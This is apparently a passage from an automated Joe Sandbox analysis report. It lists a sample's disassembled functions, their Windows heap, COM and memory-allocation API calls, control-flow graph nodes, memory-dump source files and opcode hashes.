                                                                                                                                                                                                                                          • Instruction ID: 053170d0d51e580e351fb486b0d36ec58749619aa18c8d42eaefa6ff678f00f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cc49e7f1715e61a672f22ca81c18a8a4f0a321fcba8d2ac59ba8dfd9a5fa74f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8110471A893448FD304DFA9D9C12ABBBD2DBD6310F08552CE1D5AB351C674990F8717
                                                                                                                                                                                                                                          Function 009FC180 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 123 9fc180-9fc191 124 9fc1cb 123->124 125 9fc1ba-9fc1bb call 9faa80 123->125 126 9fc1d9-9fc1df call 9faaa0 123->126 127 9fc198-9fc19f 123->127 128 9fc1a6-9fc1b8 call 9fd810 RtlReAllocateHeap 123->128 129 9fc1c5 123->129 130 9fc1d0-9fc1d6 call 9faaa0 123->130 135 9fc1cd-9fc1cf 124->135 139 9fc1c0-9fc1c3 125->139 127->124 127->126 127->128 127->129 127->130 128->135 129->124 130->126 139->135
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,009CB2E4,00000000,00000001), ref: 009FC1B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: acc43847cd87a3cc08f7699365238c7e9fb51e59be9c886d0203a24eb7c336fa
                                                                                                                                                                                                                                          • Instruction ID: e124846f17c9eed1f044c500bbe952c6ed8b4a018f763087a45fbca5982a25b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acc43847cd87a3cc08f7699365238c7e9fb51e59be9c886d0203a24eb7c336fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF0E9B290C119EBD2016F647D01ABB36659FC6731F414874FA0555112D735E427A7A3
                                                                                                                                                                                                                                          Function 009CC583 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 141 9cc583-9cc5b2 CoInitializeSecurity
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 009CC596
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                          • Opcode ID: daa5eae986d49e0d7795dc860674e45c85bc978f75c55187e976234877cd03b2
                                                                                                                                                                                                                                          • Instruction ID: e3218b2ecc079c20ed8931807308b7754784099c3d35eb00595b2d9bf5382dd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa5eae986d49e0d7795dc860674e45c85bc978f75c55187e976234877cd03b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8D0C9323D530576F93486089C63F1422049702F94F341A18B363FE2D0C8D17203860C
                                                                                                                                                                                                                                          Function 009CC550 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 140 9cc550-9cc580 CoInitializeEx
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 009CC564
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                          • Opcode ID: 79ed2677479ac16d8a8293af34e578cd2b3aaffea86af93c007a8e7868f86625
                                                                                                                                                                                                                                          • Instruction ID: 4454ee903f67e02eb46c9f792da7a5d37d984eae23080a76f1e2a1c49c53355c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79ed2677479ac16d8a8293af34e578cd2b3aaffea86af93c007a8e7868f86625
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51D0A72329050C27D504E35ADC57F22731CCB827E4F50061DE2A2C62D1D9C06A279576
                                                                                                                                                                                                                                          Function 009FAAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 143 9faaa0-9faaac 144 9faac4-9faac5 143->144 145 9faab3-9faabe call 9fd810 RtlFreeHeap 143->145 145->144
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,009FC1D6,?,009CB2E4,00000000,00000001), ref: 009FAABE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                          • Opcode ID: aa553b167bc4981e098f79fe04fb1f3ee1af0d3eab916bf642f27253a80c94ef
                                                                                                                                                                                                                                          • Instruction ID: b6648449eedfd5016ca604717e94989052c85e5f246390882336ad3ab60f46f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa553b167bc4981e098f79fe04fb1f3ee1af0d3eab916bf642f27253a80c94ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD01231506122EBC6115F64FC06BDA3A59EF497A0F074861B5006B071C671EC92D6D0
                                                                                                                                                                                                                                          Function 009FAA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 148 9faa80-9faa97 call 9fd810 RtlAllocateHeap
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,?,009FC1C0), ref: 009FAA90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 7cdbff2b82dd21d7bcca82e2b01629ee901f2369913d2da7993a900ea26911b7
                                                                                                                                                                                                                                          • Instruction ID: fc4f9d1dedb6e769dee7a283c3f63c613135e7d3aa706f2dfc2a19d593c305c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cdbff2b82dd21d7bcca82e2b01629ee901f2369913d2da7993a900ea26911b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52C09231046120BBCA106B15FC09FCA7F69EF857A1F0288A5FA08670B2C761AC92DBD4
                                                                                                                                                                                                                                          Function 00A186DC Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00A190D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: fde8d00a1ed8c1c182ee9d713b26935fded306cdc39af175b42d84e782ab68ed
                                                                                                                                                                                                                                          • Instruction ID: ca097dd8e14c414d365392d7242939659585508d0134532b099ffd012380d69e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fde8d00a1ed8c1c182ee9d713b26935fded306cdc39af175b42d84e782ab68ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901717150C604CFD7006F68D4847BEBBF0FF54310F114A28DAC287A80DA395890DA57
                                                                                                                                                                                                                                          Function 00A18561 Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00A196D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 3843679b24020177868db017e4cbe4cf0a730304f68c1b69a201f5bc7adf8089
                                                                                                                                                                                                                                          • Instruction ID: c4d75db2667aa6e42283e789b23d7851db9dc2fded871969d3c93aa5eec95072
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3843679b24020177868db017e4cbe4cf0a730304f68c1b69a201f5bc7adf8089
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE065B040C608DFD3802F25A0446BEFAF4EB11350F22080E94D29A600D27548D0EB46
                                                                                                                                                                                                                                          Function 009CE71B Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3861434553-0
                                                                                                                                                                                                                                          • Opcode ID: 8358eddf9ecfaaf25dc82322558f9feeed6788a9633e75f28cbedfbf08674134
                                                                                                                                                                                                                                          • Instruction ID: 13cdafc236478aad30e7905bf2518338bf1af4c86ac3f9dd2dc7e2b1b58dc71f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8358eddf9ecfaaf25dc82322558f9feeed6788a9633e75f28cbedfbf08674134
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8C022B338A00A8FC308C3B8CC2282A332CA30028A3202B28C083C3328CC0000338A0E

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 009E41C0 Relevance: 24.8, Strings: 19, Instructions: 1025COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                          • API String ID: 0-2905094782
                                                                                                                                                                                                                                          • Opcode ID: b90071b033833fbad3471bd486d4aec2a0bf1e978e37ecd8de4b33ff51091a21
                                                                                                                                                                                                                                          • Instruction ID: cdbb211cc7e5baf4967196c6917e1830557324d5e017cf39690a3286f9783f5b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b90071b033833fbad3471bd486d4aec2a0bf1e978e37ecd8de4b33ff51091a21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 139295B5905269CBDB25CF99DC887DEBBB1FB84304F2082E8D4596B350DB744A86CF81
                                                                                                                                                                                                                                          Function 009E4380 Relevance: 23.4, Strings: 18, Instructions: 948COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
